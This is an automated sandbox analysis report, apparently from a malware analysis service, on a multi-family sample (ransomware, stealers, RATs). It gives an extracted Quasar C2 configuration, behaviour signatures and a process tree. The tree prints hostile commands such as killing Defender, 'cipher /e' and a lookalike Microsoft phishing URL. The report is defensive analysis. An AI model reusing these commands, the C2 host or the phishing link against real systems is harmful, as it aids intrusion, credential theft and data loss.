Overview

overview

10

Static

static

10

vir.exe

windows11-21h2-x64

10

Resubmissions

26-12-2024 15:01

241226-sec6vayjgx 10

27-09-2024 10:28

240927-mh3m1sxgrm 10

18-08-2024 19:49

240818-yjmtqsthkm 10

18-08-2024 14:30

240818-rvdxmsxgjg 10

15-08-2024 23:29

240815-3g3jmawdnq 10

15-08-2024 23:15

240815-28syts1brg 10

15-08-2024 22:57

240815-2w8thszepa 10

Analysis

  • max time kernel
    107s
  • max time network
    161s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    18-08-2024 19:49

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    vir.exe

  • Size

    336.1MB

  • MD5

    bc82ea785da1180a8a964b3e54ad106c

  • SHA1

    4c1952ce778455af8ed10dca7b9f77d7815e8d0a

  • SHA256

    c283ed662a29c18b117ba63ac41cca356934c6a29a1eb66e30d8305637e3411b

  • SHA512

    62bf34d75e913a47185664a34555678d0b8c2cf03c9e922b0bdcb085713322bafba2bf396b43a4cda7e0be6d315aea027bba29c628fe561d01e3026b4e0b405b

  • SSDEEP

    6291456:72qVJw+odBeWFv1k4R4b0ewZkhT4ofHwJjvZDQPf2tLSkHZdHVeVF0oJ:yr+WeSWgfecGT4RjvqP85/A33

Score
10/10
djvumassloggernjratquasarumbralromkacredential_accessdefense_evasiondiscoveryevasionexecutionexploitpersistenceprivilege_escalationransomwarespywarestealertrojanupx

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

romka

C2

jozzu420-51305.portmap.host:51305

Mutex

0445c342-b551-411c-9b80-cd437437f491

Attributes
  • encryption_key

    E1BF1D99459F04CAF668F054744BC2C514B0A3D6

  • install_name

    Romilyaa.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Windows 10 Boot

  • subdirectory

    SubDir

Signatures

  • Detect Umbral payload 3 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

    ransomwaredjvu
  • MassLogger

    Masslogger is a .NET stealer targeting passwords from browsers, email and cryptocurrency clients.

    stealerspywaremasslogger
  • MassLogger Main payload 2 IoCs
  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
    evasion
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
    evasion
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Windows security bypass 2 TTPs 7 IoCs
    evasiontrojan
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

    Run Powershell and hide display window.

    execution
  • Disables RegEdit via registry modification 1 IoCs
    evasion
  • Downloads MZ/PE file
  • Drops file in Drivers directory 6 IoCs
  • Manipulates Digital Signatures 1 TTPs 1 IoCs

    Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Possible privilege escalation attempt 5 IoCs
    exploit
  • .NET Reactor proctector 35 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 5 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

    persistenceprivilege_escalation
  • Executes dropped EXE 46 IoCs
  • Indirect Command Execution 1 TTPs 17 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

    defense_evasion
  • Loads dropped DLL 10 IoCs
  • Modifies file permissions 1 TTPs 5 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Windows security modification 2 TTPs 6 IoCs
    evasiontrojan
  • Adds Run key to start application 2 TTPs 5 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 2 IoCs
    persistence
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Password Policy Discovery 1 TTPs

    Attempt to access detailed information about the password policy used within an enterprise network.

    discovery
  • AutoIT Executable 4 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 44 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
    discovery
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
    ransomware
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 61 IoCs
  • Drops file in Windows directory 16 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 13 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • NSIS installer 4 IoCs
    installer
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 4 IoCs
    evasion
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 19 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 7 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • NTFS ADS 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 12 IoCs
  • Runs regedit.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 42 IoCs
  • Suspicious use of SetWindowsHookEx 20 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\vir.exe
    "C:\Users\Admin\AppData\Local\Temp\vir.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2128
    • C:\Users\Admin\AppData\Local\Temp\f7d23f73-dc20-4c37-b6c4-c91b1aea8bb2\ProgressBarSplash.exe
      "C:\Users\Admin\AppData\Local\Temp\f7d23f73-dc20-4c37-b6c4-c91b1aea8bb2\ProgressBarSplash.exe" -unpacking
      2⤵
      • Executes dropped EXE
      PID:1040
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\!main.cmd" "
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:784
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /K spread.cmd
        3⤵
          PID:3956
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /K doxx.cmd
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2324
          • C:\Windows\SysWOW64\ipconfig.exe
            ipconfig
            4⤵
            • System Location Discovery: System Language Discovery
            • Gathers network information
            PID:5096
          • C:\Windows\SysWOW64\net.exe
            net accounts
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2156
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 accounts
              5⤵
                PID:1032
            • C:\Windows\SysWOW64\net.exe
              net user
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1448
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 user
                5⤵
                  PID:3288
              • C:\Windows\SysWOW64\tasklist.exe
                tasklist /apps /v /fo table
                4⤵
                • Enumerates processes with tasklist
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5052
            • C:\Windows\SysWOW64\PING.EXE
              ping google.com -t -n 1 -s 4 -4
              3⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:4468
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im WindowsDefender.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4972
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /K handler.cmd
              3⤵
              • System Location Discovery: System Language Discovery
              PID:4704
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://https-login--microsoftonline--com.httpsproxy.net/common/reprocess?ctx=rQQIARAAhZI7b9tmFED1sOUH2tpIi6IBOjhFh6IppU98SgYykCZDSRZJW3xY5CKQFCU-RVokRZFjl2RMlg4BshToYrRA0S5FG7SZPRhBhg7JP_AQFB0Kb42SzEaWi3twz3bP9iZeR9A6qIOvq3Ad7H-JEjiGopgBIbCJQ2jbAFALsXCoOW4jqxNM4KY-v7G9i-78f4He2iD_ePzfk3vPf5TPynt2kkTxfqORZVk9nEwc06qbYdDw9dnYmU0X8G_l8rNy-VFl3ZpBsnhWiXGkhcJNFGmBFsDaTQKH65zb8wRJbWoBk_Cul_M5AHwxsPvSNOfoaaIGXUyVGJSXNFujuaXA9hy1kFcOmXC02VRXPif5K98PBLabqK5XaPQxrAWaL9Ac9qKyI5BpYsNvRjh3CuvfytYknAejKIyTR9XvKoGro8xdDerJTJDKBVpkA3HQQxkptBTACrQWELhCGxZNePmSF8BEyn3F7rQ0KOCXrLqQj6kxnlMCCVEpaaUDKj_tKzOJ6BkeTSnDUetQtPsTxE1OTN1gjcg-POpSQ4ykAsZkMX45UsQCCU_5JZeTkD8vIN1dmrSWGJno6EfQMmMD21UOID81JddwLSocRJMoPvRswVPmTtA9WQCP46dSMHdka44OOUk7SY_jTFmQTCcba0LsQDMePZ0NxU6XUJnIwMBowJLNaS_MME4FqLhoH6Xs8YA2AacL_QwLs7PqzWveu4B_qdZWSxDOzqtEGFkzZ7wXzcOJ41vXJbGAG8Jb6oSBVSd9_9la-XLt083a7heflfZKX30CqvubK6q-oau18vfrq-Ie_nr558W3Nw9-euJ-_vCELZ2vN1zR6cSnlNVQ1Wnum32xKJZ3Va7X16c8OwAm65q9NB22iNvynfZ-80Gt_KBWO69tdekRz0j4CPxTq93fKP2-9d52X3zw8fZ26oz80NR9K77xruGnH5auPnr5198XPzy-_6pzufONeVuOnDFsZIJCTaX2kJOLlCQbrkCQzpF0wCBa4VHDIkTG8Z2fd0uvAQ2
              3⤵
              • Enumerates system info in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:3488
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb482b3cb8,0x7ffb482b3cc8,0x7ffb482b3cd8
                4⤵
                  PID:1984
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,18186209725588479638,16124298528517186762,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:2
                  4⤵
                    PID:1156
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1892,18186209725588479638,16124298528517186762,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 /prefetch:3
                    4⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3632
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1892,18186209725588479638,16124298528517186762,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2660 /prefetch:8
                    4⤵
                      PID:2284
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,18186209725588479638,16124298528517186762,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3084 /prefetch:1
                      4⤵
                        PID:4508
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,18186209725588479638,16124298528517186762,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3092 /prefetch:1
                        4⤵
                          PID:3408
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,18186209725588479638,16124298528517186762,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:1
                          4⤵
                            PID:5260
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1892,18186209725588479638,16124298528517186762,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3456 /prefetch:8
                            4⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:5780
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,18186209725588479638,16124298528517186762,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
                            4⤵
                              PID:5540
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,18186209725588479638,16124298528517186762,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1
                              4⤵
                                PID:5504
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,18186209725588479638,16124298528517186762,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
                                4⤵
                                  PID:5920
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,18186209725588479638,16124298528517186762,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5868 /prefetch:1
                                  4⤵
                                    PID:5720
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1892,18186209725588479638,16124298528517186762,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5148 /prefetch:8
                                    4⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:5520
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,18186209725588479638,16124298528517186762,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1740 /prefetch:1
                                    4⤵
                                      PID:6840
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,18186209725588479638,16124298528517186762,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
                                      4⤵
                                        PID:6852
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,18186209725588479638,16124298528517186762,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
                                        4⤵
                                          PID:6860
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,18186209725588479638,16124298528517186762,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6356 /prefetch:1
                                          4⤵
                                            PID:1536
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,18186209725588479638,16124298528517186762,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6532 /prefetch:1
                                            4⤵
                                              PID:5468
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,18186209725588479638,16124298528517186762,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1768 /prefetch:1
                                              4⤵
                                                PID:6460
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,18186209725588479638,16124298528517186762,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7156 /prefetch:1
                                                4⤵
                                                  PID:6436
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,18186209725588479638,16124298528517186762,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7148 /prefetch:1
                                                  4⤵
                                                    PID:6156
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,18186209725588479638,16124298528517186762,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7172 /prefetch:1
                                                    4⤵
                                                      PID:1884
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,18186209725588479638,16124298528517186762,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7260 /prefetch:1
                                                      4⤵
                                                        PID:3432
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,18186209725588479638,16124298528517186762,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8120 /prefetch:1
                                                        4⤵
                                                          PID:5740
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /K cipher.cmd
                                                        3⤵
                                                          PID:3436
                                                          • C:\Windows\SysWOW64\cipher.exe
                                                            cipher /e
                                                            4⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:4612
                                                          • C:\Windows\SysWOW64\cipher.exe
                                                            cipher /e
                                                            4⤵
                                                              PID:5172
                                                            • C:\Windows\SysWOW64\cipher.exe
                                                              cipher /e
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1252
                                                            • C:\Windows\SysWOW64\cipher.exe
                                                              cipher /e
                                                              4⤵
                                                                PID:5652
                                                            • C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\Rover.exe
                                                              Rover.exe
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3164
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\web.htm
                                                              3⤵
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:5092
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb482b3cb8,0x7ffb482b3cc8,0x7ffb482b3cd8
                                                                4⤵
                                                                  PID:2656
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2028,11982358326492891706,6516222084566583063,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 /prefetch:3
                                                                  4⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:5448
                                                              • C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\Google.exe
                                                                Google.exe
                                                                3⤵
                                                                • Executes dropped EXE
                                                                PID:3560
                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\helper.vbs"
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:5704
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                ping google.com -t -n 1 -s 4 -4
                                                                3⤵
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                • Runs ping.exe
                                                                PID:5432
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                ping mrbeast.codes -t -n 1 -s 4 -4
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                • Runs ping.exe
                                                                PID:5524
                                                              • C:\Windows\SysWOW64\xcopy.exe
                                                                xcopy Google.exe C:\Users\Admin\Desktop
                                                                3⤵
                                                                • Enumerates system info in registry
                                                                PID:6108
                                                              • C:\Windows\SysWOW64\xcopy.exe
                                                                xcopy Rover.exe C:\Users\Admin\Desktop
                                                                3⤵
                                                                • Enumerates system info in registry
                                                                PID:5160
                                                              • C:\Windows\SysWOW64\xcopy.exe
                                                                xcopy spinner.gif C:\Users\Admin\Desktop
                                                                3⤵
                                                                • Enumerates system info in registry
                                                                PID:5632
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /K bloatware.cmd
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • Modifies registry class
                                                                PID:1464
                                                                • C:\Users\Admin\AppData\Local\Temp\vir_24093d18-2525-4c5a-8967-ccb4d09f7bfa\bloatware\1.exe
                                                                  1.exe
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Drops file in Program Files directory
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Modifies registry class
                                                                  PID:4384
                                                                  • C:\Program Files (x86)\DroidCam\vc_redist.x86.exe
                                                                    "C:\Program Files (x86)\DroidCam\vc_redist.x86.exe" /install /quiet
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:2156
